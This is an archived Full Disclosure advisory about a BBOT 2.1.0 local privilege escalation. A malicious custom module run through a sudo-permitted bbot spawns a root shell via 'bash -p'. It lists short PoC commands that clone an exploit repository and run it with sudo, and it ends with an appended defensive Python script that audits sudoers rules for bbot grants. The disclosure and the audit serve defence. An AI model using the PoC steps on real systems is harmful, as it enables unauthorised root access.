Message-ID: <CAGp_9Zh7b47xzkE_SfH=rTYeu-RCQTx1qG8Y=Fg8GC7-nDHHvA@mail.gmail.com>
Date: Fri, 18 Apr 2025 16:12:49 +0400
From: Housma mardini <housma@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] BBOT 2.1.0 - Local Privilege Escalation via Malicious Module Execution
Hi Full Disclosure,
I'd like to share a local privilege escalation technique involving BBOT
(Bighuge BLS OSINT Tool) when misconfigured with sudo access.
---
Exploit Title: BBOT 2.1.0 - Local Privilege Escalation via Malicious Module Execution
Date: 2025-04-16
Exploit Author: Huseyin Mardinli
Vendor Homepage: https://github.com/blacklanternsecurity/bbot
Version: 2.1.0.4939rc (tested)
Tested on: Kali Linux Rolling (2025.1)
CVE: N/A
Platform: Linux
Type: Local
### Description:
BBOT allows execution of custom Python modules during OSINT scans. When
configured as a sudo-executable (e.g., via NOPASSWD), a malicious module
can escalate privileges via the `setup()` function.
### PoC Steps:
1. Clone:
    git clone https://github.com/Housma/bbot-privesc.git
2. Run with sudo:
    sudo /usr/local/bin/bbot -t dummy.com -p preset.yml --event-types ROOT
3. A root shell is spawned via `bash -p` from within the module.
### GitHub (Full Write-up + PoC):
https://github.com/Housma/bbot-privesc
---
This exploit highlights how trusted open-source tools can be abused in
real-world environments.
Regards,
Huseyin Mardinli
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
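
A defender-side check for the misconfiguration described in the post, added here as an example (not part of the original message or of the BBOT project): it scans sudoers text for rules that let a user run bbot through sudo and reports whether NOPASSWD applies. The sample sudoers content, the `WATCHLIST` set and the `audit` function are constructed for illustration, and the parser is simplified (it does not follow include directives or handle escaped commas).

```python
import os
import re

WATCHLIST = {"bbot"}  # assumption: extend with other tools that load user-supplied code

# Constructed sudoers content for illustration (not from a real host).
SAMPLE = """\
Cmnd_Alias SCANNERS = /usr/local/bin/bbot, /usr/bin/nmap
analyst ALL=(root) NOPASSWD: SCANNERS
ops     ALL=(ALL) /usr/bin/systemctl restart nginx, \\
        NOPASSWD: /usr/local/bin/bbot -t *
dev     ALL=(root) NOPASSWD: /usr/bin/id, PASSWD: /usr/local/bin/bbot
backup  ALL=(root) NOPASSWD: /usr/bin/rsync  # not on the watchlist
"""

def logical_lines(text):
    """Join backslash continuations, then drop comments and blank lines."""
    for raw in re.sub(r"\\\n\s*", " ", text).splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line

def audit(text):
    """Return (user, command path, nopasswd) for each rule granting a watchlisted binary."""
    aliases, specs, findings = {}, [], []
    for line in logical_lines(text):
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
        elif "=" in line and not re.match(r"(Defaults|\w+_Alias)\b", line):
            specs.append(line)
    for line in specs:
        who, rhs = line.split("=", 1)
        nopasswd = False  # a password is required unless a tag says otherwise
        for item in re.sub(r"\([^)]*\)", "", rhs).split(","):  # drop Runas specs
            item = item.strip()
            # Tags such as NOPASSWD: carry over to later commands in the same list.
            while (tag := re.match(r"(\w+):\s*", item)):
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                item = item[tag.end():]
            for cmd in aliases.get(item, [item]):
                if cmd and os.path.basename(cmd.split()[0]) in WATCHLIST:
                    findings.append((who.split()[0], cmd.split()[0], nopasswd))
    return findings

if __name__ == "__main__":
    for user, path, nopasswd in audit(SAMPLE):
        print(f"{user}: sudo {path} (NOPASSWD={nopasswd})")
```

Rules that still require a password are reported too, since any sudo grant for a tool that loads user-supplied modules runs that module code as the target user.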